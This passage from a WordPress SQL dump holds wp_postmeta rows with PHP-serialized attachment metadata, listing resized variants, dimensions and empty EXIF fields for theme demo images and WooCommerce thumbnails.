:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"port-single-img-2a-300x208.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:208;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"port-single-img-2a-1024x709.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:709;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"port-single-img-2a-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"port-single-img-2a-768x532.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:532;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:30:\"port-single-img-2a-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:31:\"port-single-img-2a-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:30:\"port-single-img-2a-650x900.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"port-single-img-2a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:30:\"port-single-img-2a-600x415.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:415;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"port-single-img-2a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:30:\"port-single-img-2a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:30:\"port-single-img-2a-600x415.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:415;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"port-single-img-2a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51722,1594,'_wp_attached_file','2018/08/h2-rev-img-4.jpg'),(51723,1594,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1;s:6:\"height\";i:20;s:4:\"file\";s:24:\"2018/08/h2-rev-img-4.jpg\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51724,1594,'_wp_attachment_image_alt','m'),(51725,4344,'_wp_attachment_image_alt','d'),(51726,1625,'_wp_attached_file','2018/08/h3-bottom-backround-img.jpg'),(51727,1625,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:340;s:4:\"file\";s:35:\"2018/08/h3-bottom-backround-img.jpg\";s:5:\"sizes\";a:15:{s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"h3-bottom-backround-img-300x53.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:53;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"h3-bottom-backround-img-1024x181.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:181;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"h3-bottom-backround-img-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"h3-bottom-backround-img-768x136.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:136;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:36:\"h3-bottom-backround-img-1536x272.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:35:\"h3-bottom-backround-img-650x340.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:340;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:36:\"h3-bottom-backround-img-1300x340.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:340;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:35:\"h3-bottom-backround-img-650x340.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:340;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"attika_mikado_image_huge\";a:4:{s:4:\"file\";s:36:\"h3-bottom-backround-img-1300x340.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:340;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"h3-bottom-backround-img-300x340.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:340;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:35:\"h3-bottom-backround-img-600x106.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:106;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"h3-bottom-backround-img-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:35:\"h3-bottom-backround-img-300x340.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:340;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:35:\"h3-bottom-backround-img-600x106.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:106;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"h3-bottom-backround-img-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51728,4345,'_wp_attached_file','2018/08/h6-img-2a.jpg'),(51729,4345,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:820;s:4:\"file\";s:21:\"2018/08/h6-img-2a.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h6-img-2a-300x205.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:205;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"h6-img-2a-1024x700.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:700;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h6-img-2a-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"h6-img-2a-768x525.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:525;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:21:\"h6-img-2a-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:22:\"h6-img-2a-1200x650.jpg\";s:5:\"width\";i:1200;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:21:\"h6-img-2a-650x820.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:820;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h6-img-2a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:21:\"h6-img-2a-600x410.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h6-img-2a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:21:\"h6-img-2a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"h6-img-2a-600x410.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h6-img-2a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51730,1902,'_wp_attachment_image_alt','m'),(51731,1450,'_wp_attachment_image_alt','c'),(51732,1625,'_wp_attachment_image_alt','x'),(51733,1903,'_wp_attached_file','2018/07/port-single-img-3a.jpg'),(51734,1903,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:900;s:4:\"file\";s:30:\"2018/07/port-single-img-3a.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"port-single-img-3a-300x208.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:208;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"port-single-img-3a-1024x709.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:709;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"port-single-img-3a-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"port-single-img-3a-768x532.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:532;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:30:\"port-single-img-3a-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:31:\"port-single-img-3a-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:30:\"port-single-img-3a-650x900.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"port-single-img-3a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:30:\"port-single-img-3a-600x415.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:415;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"port-single-img-3a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:30:\"port-single-img-3a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:30:\"port-single-img-3a-600x415.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:415;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"port-single-img-3a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51735,1451,'_wp_attached_file','2018/08/h1-blog-post-4.jpg'),(51736,1451,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:1000;s:4:\"file\";s:26:\"2018/08/h1-blog-post-4.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"h1-blog-post-4-300x231.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:231;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"h1-blog-post-4-1024x788.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:788;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"h1-blog-post-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"h1-blog-post-4-768x591.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:591;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:26:\"h1-blog-post-4-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:27:\"h1-blog-post-4-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:27:\"h1-blog-post-4-650x1000.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1000;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"h1-blog-post-4-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"h1-blog-post-4-600x462.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"h1-blog-post-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"h1-blog-post-4-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"h1-blog-post-4-600x462.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"h1-blog-post-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51737,4345,'_wp_attachment_image_alt','d'),(51738,1633,'_wp_attached_file','2018/08/h3-top-single-img.png'),(51739,1633,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:132;s:6:\"height\";i:137;s:4:\"file\";s:29:\"2018/08/h3-top-single-img.png\";s:5:\"sizes\";a:2:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"h3-top-single-img-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"h3-top-single-img-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51740,1633,'_wp_attachment_image_alt','a'),(51741,4346,'_wp_attached_file','2018/08/h6-img-3a.jpg'),(51742,4346,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:820;s:4:\"file\";s:21:\"2018/08/h6-img-3a.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h6-img-3a-300x205.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:205;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"h6-img-3a-1024x700.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:700;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h6-img-3a-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"h6-img-3a-768x525.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:525;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:21:\"h6-img-3a-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:22:\"h6-img-3a-1200x650.jpg\";s:5:\"width\";i:1200;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:21:\"h6-img-3a-650x820.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:820;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h6-img-3a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:21:\"h6-img-3a-600x410.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h6-img-3a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:21:\"h6-img-3a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"h6-img-3a-600x410.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h6-img-3a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51743,2020,'_wp_attached_file','2018/08/h4-img-4.jpg'),(51744,2020,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1708;s:6:\"height\";i:1100;s:4:\"file\";s:20:\"2018/08/h4-img-4.jpg\";s:5:\"sizes\";a:15:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h4-img-4-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"h4-img-4-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h4-img-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"h4-img-4-768x495.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:495;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:21:\"h4-img-4-1536x989.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:989;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:20:\"h4-img-4-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:21:\"h4-img-4-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:21:\"h4-img-4-650x1100.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"attika_mikado_image_huge\";a:4:{s:4:\"file\";s:22:\"h4-img-4-1300x1100.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h4-img-4-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"h4-img-4-600x386.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:386;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h4-img-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"h4-img-4-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"h4-img-4-600x386.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:386;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h4-img-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51745,2349,'_wp_attached_file','2018/08/h7-port-img-6-1.jpg'),(51746,2349,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1100;s:4:\"file\";s:27:\"2018/08/h7-port-img-6-1.jpg\";s:5:\"sizes\";a:15:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"h7-port-img-6-1-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"h7-port-img-6-1-1024x587.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"h7-port-img-6-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"h7-port-img-6-1-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:28:\"h7-port-img-6-1-1536x880.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:27:\"h7-port-img-6-1-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:28:\"h7-port-img-6-1-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:28:\"h7-po